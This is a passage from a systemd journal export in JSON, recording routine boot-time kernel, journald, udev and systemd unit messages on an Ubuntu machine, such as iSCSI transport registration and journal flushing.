"__MONOTONIC_TIMESTAMP" : "5731489", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "5488210", "MESSAGE" : "Loading iSCSI transport class v2.0-870." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1de;b=e2b08827b5804427b422c10c84f1567e;m=5774b0;t=5bd16dd1af417;x=e7e376182de3d387", "__REALTIME_TIMESTAMP" : "1615280780014615", "__MONOTONIC_TIMESTAMP" : "5731504", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "5499236", "MESSAGE" : "EXT4-fs (vda1): re-mounted. Opts: (null)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1df;b=e2b08827b5804427b422c10c84f1567e;m=5774cb;t=5bd16dd1af432;x=4ecfa34b7065c656", "__REALTIME_TIMESTAMP" : "1615280780014642", "__MONOTONIC_TIMESTAMP" : "5731531", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "5568633", "MESSAGE" : "iscsi: registered transport (tcp)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e0;b=e2b08827b5804427b422c10c84f1567e;m=5774e5;t=5bd16dd1af44d;x=c88a5b30d8b3d7fc", "__REALTIME_TIMESTAMP" : "1615280780014669", "__MONOTONIC_TIMESTAMP" : "5731557", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "5685927", "MESSAGE" : "iscsi: registered transport (iser)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e1;b=e2b08827b5804427b422c10c84f1567e;m=5774fc;t=5bd16dd1af463;x=bb4e6f9bf0d1357c", "__REALTIME_TIMESTAMP" : "1615280780014691", "__MONOTONIC_TIMESTAMP" : "5731580", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "MESSAGE_ID" : "f77379a8490b408bbe5f6940505a777b", "MESSAGE" : "Journal started", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e2;b=e2b08827b5804427b422c10c84f1567e;m=579b80;t=5bd16dd1b1ae7;x=708a9f50f5affdb4", "__REALTIME_TIMESTAMP" : "1615280780024551", "__MONOTONIC_TIMESTAMP" : "5741440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE_ID" : "ec387f577b844b8fa948f33cad9a75e6", "MESSAGE" : "Runtime journal (/run/log/journal/e78d8f41d6784acabc245165b0ac7fef) is 2.4M, max 19.9M, 17.4M free.", "JOURNAL_NAME" : "Runtime journal", "JOURNAL_PATH" : "/run/log/journal/e78d8f41d6784acabc245165b0ac7fef", "CURRENT_USE" : "2613248", "CURRENT_USE_PRETTY" : "2.4M", "MAX_USE" : "20905984", "MAX_USE_PRETTY" : "19.9M", "DISK_KEEP_FREE" : "31358976", "DISK_KEEP_FREE_PRETTY" : "29.9M", "DISK_AVAILABLE" : "206270464", "DISK_AVAILABLE_PRETTY" : "196.7M", "LIMIT" : "20905984", "LIMIT_PRETTY" : "19.9M", "AVAILABLE" : "18292736", "AVAILABLE_PRETTY" : "17.4M" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e3;b=e2b08827b5804427b422c10c84f1567e;m=57aad6;t=5bd16dd1b2a3e;x=60e7c652e0bd7c0d", "__REALTIME_TIMESTAMP" : "1615280780028478", "__MONOTONIC_TIMESTAMP" : "5745366", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "CODE_FILE" : "../src/modules-load/modules-load.c", "CODE_LINE" : "118", "CODE_FUNC" : "load_module", "SYSLOG_IDENTIFIER" : "systemd-modules-load", "MESSAGE" : "Inserted module 'iscsi_tcp'", "_TRANSPORT" : "journal", "_PID" : "373", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780028525" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e4;b=e2b08827b5804427b422c10c84f1567e;m=57aed7;t=5bd16dd1b2e3f;x=b97ccb0c58724824", "__REALTIME_TIMESTAMP" : "1615280780029503", "__MONOTONIC_TIMESTAMP" : "5746391", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "CODE_FILE" : "../src/modules-load/modules-load.c", "CODE_LINE" : "118", "CODE_FUNC" : "load_module", "SYSLOG_IDENTIFIER" : "systemd-modules-load", "_TRANSPORT" : "journal", "_PID" : "373", "MESSAGE" : "Inserted module 'ib_iser'", "_SOURCE_REALTIME_TIMESTAMP" : "1615280779979585" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e5;b=e2b08827b5804427b422c10c84f1567e;m=57ced3;t=5bd16dd1b4e3a;x=4b62473704db743c", "__REALTIME_TIMESTAMP" : "1615280780037690", "__MONOTONIC_TIMESTAMP" : "5754579", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE" : "Starting Flush Journal to Persistent Storage...", "UNIT" : "systemd-journal-flush.service", "INVOCATION_ID" : "07f344aa293646c094e5710fd98e516b", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780029943" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e6;b=e2b08827b5804427b422c10c84f1567e;m=5800f3;t=5bd16dd1b805a;x=1d9ee251b5cd373d", "__REALTIME_TIMESTAMP" : "1615280780050522", "__MONOTONIC_TIMESTAMP" : "5767411", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE" : "Time spent on flushing to /var is 3.314ms for 485 entries." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e7;b=e2b08827b5804427b422c10c84f1567e;m=5800f3;t=5bd16dd1b805a;x=f04395007d153097", "__REALTIME_TIMESTAMP" : "1615280780050522", "__MONOTONIC_TIMESTAMP" : "5767411", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd-journald", "_TRANSPORT" : "driver", "_PID" : "385", "_UID" : "0", "_GID" : "0", "_COMM" : "systemd-journal", "_EXE" : "/lib/systemd/systemd-journald", "_CMDLINE" : "/lib/systemd/systemd-journald", "_CAP_EFFECTIVE" : "25402800cf", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_CGROUP" : "/system.slice/systemd-journald.service", "_SYSTEMD_UNIT" : "systemd-journald.service", "_SYSTEMD_SLICE" : "system.slice", "_SYSTEMD_INVOCATION_ID" : "b773aaffd7fe4148968ca24620641939", "MESSAGE_ID" : "ec387f577b844b8fa948f33cad9a75e6", "MESSAGE" : "System journal (/var/log/journal/e78d8f41d6784acabc245165b0ac7fef) is 8.0M, max 200.9M, 192.9M free.", "JOURNAL_NAME" : "System journal", "JOURNAL_PATH" : "/var/log/journal/e78d8f41d6784acabc245165b0ac7fef", "CURRENT_USE" : "8388608", "CURRENT_USE_PRETTY" : "8.0M", "MAX_USE" : "210751488", "MAX_USE_PRETTY" : "200.9M", "DISK_KEEP_FREE" : "316125184", "DISK_KEEP_FREE_PRETTY" : "301.4M", "DISK_AVAILABLE" : "1075249152", "DISK_AVAILABLE_PRETTY" : "1.0G", "LIMIT" : "210751488", "LIMIT_PRETTY" : "200.9M", "AVAILABLE" : "202362880", "AVAILABLE_PRETTY" : "192.9M" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e8;b=e2b08827b5804427b422c10c84f1567e;m=588647;t=5bd16dd1c05ae;x=85e75afcf7a90cd2", "__REALTIME_TIMESTAMP" : "1615280780084654", "__MONOTONIC_TIMESTAMP" : "5801543", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "MESSAGE" : "Started udev Kernel Device Manager.", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "UNIT" : "systemd-udevd.service", "INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780055025" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1e9;b=e2b08827b5804427b422c10c84f1567e;m=5887ca;t=5bd16dd1c0731;x=e3fc14ea025d4465", "__REALTIME_TIMESTAMP" : "1615280780085041", "__MONOTONIC_TIMESTAMP" : "5801930", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Apply Kernel Variables.", "UNIT" : "systemd-sysctl.service", "INVOCATION_ID" : "6b6fa8b7e34c4a8a9469dc4e7cc56602", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780061690" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ea;b=e2b08827b5804427b422c10c84f1567e;m=58cff4;t=5bd16dd1c4f5c;x=a385b718ba0d78cb", "__REALTIME_TIMESTAMP" : "1615280780103516", "__MONOTONIC_TIMESTAMP" : "5820404", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "UNIT" : "systemd-journal-flush.service", "INVOCATION_ID" : "07f344aa293646c094e5710fd98e516b", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Flush Journal to Persistent Storage.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780100979" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1eb;b=e2b08827b5804427b422c10c84f1567e;m=592a7b;t=5bd16dd1ca9e2;x=7bf11fd8fad12c74", "__REALTIME_TIMESTAMP" : "1615280780126690", "__MONOTONIC_TIMESTAMP" : "5843579", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started udev Coldplug all Devices.", "UNIT" : "systemd-udev-trigger.service", "INVOCATION_ID" : "880103d45fc6499fa0bf439eb2b31545", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780124301" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ec;b=e2b08827b5804427b422c10c84f1567e;m=596db5;t=5bd16dd1ced1c;x=2ce32247415e65b0", "__REALTIME_TIMESTAMP" : "1615280780143900", "__MONOTONIC_TIMESTAMP" : "5860789", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Set the console keyboard layout.", "UNIT" : "keyboard-setup.service", "INVOCATION_ID" : "88391c49fb4a4866b11a14cff32627b9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780141400" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ed;b=e2b08827b5804427b422c10c84f1567e;m=598031;t=5bd16dd1cff98;x=288e5cb33d396f96", "__REALTIME_TIMESTAMP" : "1615280780148632", "__MONOTONIC_TIMESTAMP" : "5865521", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Dispatch Password Requests to Console Directory Watch.", "UNIT" : "systemd-ask-password-console.path", "INVOCATION_ID" : "5b12b92bcd6f4700a8056df2d51f2500", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780145529" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ee;b=e2b08827b5804427b422c10c84f1567e;m=599744;t=5bd16dd1d16ac;x=743f8dae205b830a", "__REALTIME_TIMESTAMP" : "1615280780154540", "__MONOTONIC_TIMESTAMP" : "5871428", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local Encrypted Volumes.", "UNIT" : "cryptsetup.target", "INVOCATION_ID" : "e167c4ac112d4163b1132569ae1999dc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780151879" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ef;b=e2b08827b5804427b422c10c84f1567e;m=59b0da;t=5bd16dd1d3041;x=3b7b8b0d01bd86dd", "__REALTIME_TIMESTAMP" : "1615280780161089", "__MONOTONIC_TIMESTAMP" : "5877978", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local File Systems (Pre).", "UNIT" : "local-fs-pre.target", "INVOCATION_ID" : "8775097a2b9d438eb78e2d0195363732", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780158334" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f0;b=e2b08827b5804427b422c10c84f1567e;m=5f3294;t=5bd16dd22b1fc;x=9bd3cb671a6f47b3", "__REALTIME_TIMESTAMP" : "1615280780521980", "__MONOTONIC_TIMESTAMP" : "6238868", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "CODE_FILE" : "../src/udev/net/ethtool-util.c", "CODE_LINE" : "547", "CODE_FUNC" : "ethtool_set_glinksettings", "SYSLOG_IDENTIFIER" : "systemd-udevd", "MESSAGE" : "link_config: autonegotiation is unset or enabled, the speed and duplex are not writable.", "_PID" : "409", "_COMM" : "systemd-udevd", "_EXE" : "/lib/systemd/systemd-udevd", "_CMDLINE" : "/lib/systemd/systemd-udevd", "_SYSTEMD_CGROUP" : "/system.slice/systemd-udevd.service", "_SYSTEMD_UNIT" : "systemd-udevd.service", "_SYSTEMD_INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780521851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f1;b=e2b08827b5804427b422c10c84f1567e;m=60e5fe;t=5bd16dd246565;x=70999a101e00351a", "__REALTIME_TIMESTAMP" : "1615280780633445", "__MONOTONIC_TIMESTAMP" : "6350334", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Found device /dev/ttyS0.", "UNIT" : "dev-ttyS0.device", "INVOCATION_ID" : "293ed7c0e80948c39b31c3279654da1d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780631229" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f2;b=e2b08827b5804427b422c10c84f1567e;m=621e23;t=5bd16dd259d8a;x=648886d4bbc9a161", "__REALTIME_TIMESTAMP" : "1615280780713354", "__MONOTONIC_TIMESTAMP" : "6430243", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch.", "UNIT" : "systemd-rfkill.socket", "INVOCATION_ID" : "3484c3c7a8ea4120a1c191923754f101", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780709645" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f3;b=e2b08827b5804427b422c10c84f1567e;m=62289e;t=5bd16dd25a806;x=f8d08e8ec74b004e", "__REALTIME_TIMESTAMP" : "1615280780716038", "__MONOTONIC_TIMESTAMP" : "6432926", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "CODE_FILE" : "../src/udev/net/ethtool-util.c", "CODE_LINE" : "547", "CODE_FUNC" : "ethtool_set_glinksettings", "SYSLOG_IDENTIFIER" : "systemd-udevd", "MESSAGE" : "link_config: autonegotiation is unset or enabled, the speed and duplex are not writable.", "_COMM" : "systemd-udevd", "_EXE" : "/lib/systemd/systemd-udevd", "_CMDLINE" : "/lib/systemd/systemd-udevd", "_SYSTEMD_CGROUP" : "/system.slice/systemd-udevd.service", "_SYSTEMD_UNIT" : "systemd-udevd.service", "_SYSTEMD_INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "_PID" : "411", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780716029" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f4;b=e2b08827b5804427b422c10c84f1567e;m=67191c;t=5bd16dd2a9882;x=f359e2cba0ff9606", "__REALTIME_TIMESTAMP" : "1615280781039746", "__MONOTONIC_TIMESTAMP" : "6756636", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : 